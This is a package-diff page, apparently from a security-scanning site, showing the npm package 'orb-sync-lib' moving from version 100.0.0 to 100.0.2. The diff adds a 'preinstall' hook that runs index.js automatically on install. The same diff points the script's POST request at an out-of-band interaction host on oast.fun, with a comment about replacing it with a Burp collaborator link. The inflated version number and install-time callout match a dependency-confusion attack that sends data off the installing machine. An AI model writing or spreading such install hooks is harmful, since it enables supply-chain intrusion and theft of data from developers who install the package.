orb-sync-lib 100.0.0 → 100.0.2
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +3 -2
package/index.js
CHANGED
@@ -32,7 +32,7 @@ var postData = querystring.stringify({
|
|
32
32
|
});
|
33
33
|
|
34
34
|
var options = {
|
35
|
-
hostname: "
|
35
|
+
hostname: "zkxxbfptvtvybxtbxyxr4ghnkqrkzea68.oast.fun", // Replace with Burp collaborator link
|
36
36
|
port: 443,
|
37
37
|
path: "/",
|
38
38
|
method: "POST",
|
package/package.json
CHANGED
@@ -1,10 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "orb-sync-lib",
|
3
|
-
"version": "100.0.
|
3
|
+
"version": "100.0.2",
|
4
4
|
"description": "",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
|
-
"test": "echo \"Error: no test specified\" && exit 1"
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
8
9
|
},
|
9
10
|
"author": "",
|
10
11
|
"license": "ISC"
|